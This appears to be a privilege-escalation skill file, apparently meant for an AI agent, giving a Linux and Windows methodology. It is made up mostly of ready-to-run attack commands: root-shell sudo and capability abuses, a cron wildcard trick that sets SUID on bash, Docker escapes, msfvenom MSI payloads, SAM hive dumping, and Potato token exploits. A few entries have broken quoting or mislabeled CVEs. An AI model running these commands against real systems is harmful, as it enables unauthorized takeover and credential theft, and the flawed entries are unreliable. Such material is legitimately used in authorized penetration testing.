| name | privilege-escalation |
| description | Comprehensive privilege escalation methodology for Linux and Windows. Covers kernel exploits, SUID binaries, service misconfigurations, credential harvesting, and both local privilege escalation paths. |
Privilege Escalation Testing Methodology
Overview
Privilege escalation allows attackers to gain higher-level permissions on a compromised system. This skill covers Linux and Windows privilege escalation techniques.
Linux Privilege Escalation
Initial Enumeration
System Information:
uname -a
cat /etc/os-release
cat /proc/version
cat /etc/issue
hostnamectl
User Information:
whoami
id
groups
cat /etc/passwd
cat /etc/group
getent group sudo
getent group wheel
last
lastlog
Environment Variables:
env
printenv
set
echo $PATH
Kernel Exploits
Common Exploits:
- CVE-2016-5195 (DirtyCow) - Linux kernel < 4.8.3
- CVE-2017-16995 (eBPF) - Linux kernel 4.4.0-116
- CVE-2019-13272 (PTRACE_TRACEME) - Linux kernel < 5.1.17
- CVE-2021-3156 (Sudo Baron Samedit) - Sudo 1.8.31 - 1.9.5p1
- CVE-2021-4034 (PwnKit) - pkexec versions < 0.120
- CVE-2022-0847 (DirtyPipe) - Linux kernel 5.8 - 5.16.11
- CVE-2023-4911 (Looney Tunables) - glibc 2.34-2.38
Detect Vulnerable Kernel:
uname -r
cat /etc/os-release
searchsploit linux kernel $(uname -r | cut -d'-' -f1)
SUID Binaries
Find SUID Binaries:
find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -ls 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
Find SGID Binaries:
find / -perm -2000 -type f 2>/dev/null
GTFOBins:
curl https://gtfobins.github.io/
Sudo Privileges
Check Sudo Permissions:
sudo -l
sudo -l -U username
Sudo Abuse (GTFOBins):
sudo /bin/bash
EDITOR='vi -- /etc/sudoers' sudoedit /etc/passwd
sudo LD_PRELOAD=/path/to/evil.so command
sudo awk 'BEGIN {system("/bin/sh")}'
sudo python -c 'import os; os.system("/bin/sh")'
sudo find / -exec /bin/sh \; -quit
Sudo Version Exploits:
sudoedit -s /' $(python3 -c 'print("A"*4000)')
Capabilities
Enumerate Capabilities:
getcap -r / 2>/dev/null
find / -type f -print0 2>/dev/null | xargs -0 getcap
Dangerous Capabilities:
cap_setuid - Can change UID
cap_setgid - Can change GID
cap_sys_admin - Administrative privileges
cap_dac_read_search - Bypass DAC restrictions
cap_sys_ptrace - Process debugging
Exploit Examples:
/usr/bin/python3 = cap_setuid+ep
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
openssl enc -in /etc/shadow
Cron Jobs
Enumerate Cron:
cat /etc/crontab
ls -la /etc/cron*
cat /var/spool/cron/*
crontab -l
find /etc/cron* -type f -perm -o+w 2>/dev/null
Writable Cron Scripts:
ls -la /usr/local/bin/clean.sh
Wildcards in Cron:
echo 'sh -c "chmod +s /bin/bash"' > /var/log/runme.sh
echo "" > /var/log/--checkpoint=1
echo "" > /var/log/--checkpoint-action=exec=sh runme.sh
Path Hijacking
Current PATH:
echo $PATH
Writable Directories in PATH:
for dir in $(echo $PATH | tr ':' ' '); do
[ -w "$dir" ] && echo "Writable: $dir"
done
Create Malicious Binary:
cd /home/user/bin
cat > sudo << 'EOF'
/bin/bash
EOF
chmod +x sudo
NFS Exports
Check NFS:
cat /etc/exports
showmount -e localhost
Exploit no_root_squash:
mount -t nfs target:/shared /mnt/nfs
cd /mnt/nfs
cp /bin/bash .
chmod +s bash
Docker/LXC Privilege Escalation
Check Container Status:
ls -la /.dockerenv
cat /proc/1/cgroup
docker ps
id
Docker Privilege Escalation:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Docker Socket:
docker -H unix:///var/run/docker.sock run --rm -v /:/mnt -it alpine chroot /mnt sh
Privileged Container:
mkdir /tmp/cgroup && mount -t cgroup -o memory,rdma cgroup /tmp/cgroup
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
Kernel Modules
Loaded Modules:
lsmod
cat /proc/modules
Writable Kernel Modules:
find /lib/modules -writable 2>/dev/null
SSH Keys
Find SSH Keys:
find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null
find / -name "*.pem" 2>/dev/null
Password Hunting
History Files:
cat ~/.bash_history
cat ~/.zsh_history
cat ~/.mysql_history
cat ~/.psql_history
find /home -name "*history" 2>/dev/null
Configuration Files:
grep -r "password" /etc/*.conf 2>/dev/null
grep -r "pass" /var/www/html/* 2>/dev/null
find /var/www -name "config*" -o -name "*.php" -o -name "*.xml" 2>/dev/null
Backup Files:
find / -name "*.bak" 2>/dev/null
find / -name "*.backup" 2>/dev/null
find / -name "*~" 2>/dev/null
Windows Privilege Escalation
Initial Enumeration
System Information:
systeminfo
ver
hostname
whoami /all
User Information:
whoami
whoami /groups
whoami /priv
net user
net localgroup administrators
net localgroup "Remote Management Users"
qwinsta
Network Information:
ipconfig /all
route print
netstat -ano
arp -a
Process Information:
tasklist /v
tasklist /svc
wmic process list brief
Service Information:
sc query
sc query type= service
wmic service get name,displayname,pathname,startmode
Windows Privileges
Check Current Privileges:
whoami /priv
Dangerous Privileges:
- SeImpersonatePrivilege - Potatoes
- SeAssignPrimaryTokenPrivilege - Token manipulation
- SeTcbPrivilege - Trusted computing base
- SeBackupPrivilege - Backup files
- SeRestorePrivilege - Restore files
- SeTakeOwnershipPrivilege - Take ownership
- SeDebugPrivilege - Debug processes
- SeLoadDriverPrivilege - Load drivers
Kernel Exploits
Common Exploits:
- CVE-2016-0099 - Secondary Logon
- CVE-2016-0147 - Windows SMB
- CVE-2016-3225 - Secondary Logon
- CVE-2017-0213 - Windows COM
- CVE-2019-1132 - Win32k
- CVE-2019-1388 - Certificate Dialog
- CVE-2020-0785 - Windows SMBv3
- CVE-2020-1472 - Zerologon
- CVE-2021-36934 - HiveNightmare/SeriousSAM
- CVE-2021-40444 - MSHTML
- CVE-2022-21999 - Windows Print Spooler
- CVE-2023-21716 - Windows SmartScreen
Check Patch Level:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"Hotfix(s)"
wmic qfe get Caption,Description,HotFixID,InstalledOn
Exploit Suggester:
# Windows Exploit Suggester
python windows-exploit-suggester.py -d windows-db.xlsx -i systeminfo.txt
Service Exploitation
Check Service Permissions:
sc qc <service>
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Everyone" *
Unquoted Service Paths:
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32" | findstr /i /v '"'
Exploit Unquoted Path:
# If path is: C:\Program Files\Some Service\service.exe
# Create: C:\Program.exe with payload
Insecure Service Permissions:
# If service has change config permissions
sc config <service> binpath= "C:\evil.exe"
sc start <service>
Insecure Registry Permissions:
# Check registry permissions
reg query "HKLM\System\CurrentControlSet\Services\<service>"
# If ImagePath is writable
AlwaysInstallElevated
Check Registry:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Exploit:
# Create malicious MSI
msfvenom -p windows/exec CMD="cmd.exe" -f msi > evil.msi
msiexec /quiet /qn /i C:\evil.msi
Scheduled Tasks
Enumerate Tasks:
schtasks /query /fo LIST /v
type C:\Windows\System32\Tasks\*
Check Task Permissions:
# Look for writable task files
accesschk.exe /accepteula -quv "C:\Windows\System32\Tasks"
Token Privileges
Potato Family (SeImpersonatePrivilege):
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {clsid}
RoguePotato.exe -r 10.10.10.10 -e "cmd.exe"
SweetPotato.exe -a "whoami"
GodPotato.exe -cmd "cmd /c whoami"
PrintSpoofer:
PrintSpoofer.exe -i -c cmd
Autoruns
Check Autorun Locations:
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Stored Credentials
Credential Manager:
vaultcmd /list
vaultcmd /listcreds:"Windows Credentials"
Saved Credentials:
cmdkey /list
Runas with Saved Creds:
runas /savecred /user:administrator cmd.exe
LSA Secrets
Extract from SAM:
# If SAM/SYSTEM/SECURITY are accessible
reg save HKLM\SAM C:\temp\SAM
reg save HKLM\SYSTEM C:\temp\SYSTEM
reg save HKLM\SECURITY C:\temp\SECURITY
# Dump with secretsdump
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
Windows Defender Exclusion
Check Exclusions:
Get-MpPreference | Select-Object -Property ExclusionPath, ExclusionExtension, ExclusionProcess
PATH Hijacking
Writable PATH Directories:
$env:Path -split ";" | ForEach-Object { if (Test-Path $_ -PathType Container) {
$acl = Get-Acl $_; if ($acl.Access | Where-Object { $_.FileSystemRights -match "Write" }) { Write-Output "Writable: $_" } } }
Automated Tools
Linux
./linpeas.sh
./LinEnum.sh -r report
./lse.sh -l2
./upc.sh
./pspy64 -pf -i 1000
Windows
# WinPEAS
winPEASany.exe
# PowerUp
. .\PowerUp.ps1
Invoke-AllChecks
# PrivescCheck
. .\PrivescCheck.ps1
Invoke-PrivescCheck
# Windows Exploit Suggester
. .\WES.ps1
Get-WES
# Seatbelt
Seatbelt.exe -group=all
# SharpUp
SharpUp.exe
Testing Checklist
Linux
Windows
References
- GTFOBins (Linux)
- LOLBAS (Windows)
- Privilege Escalation Matrix
- HackTricks Privilege Escalation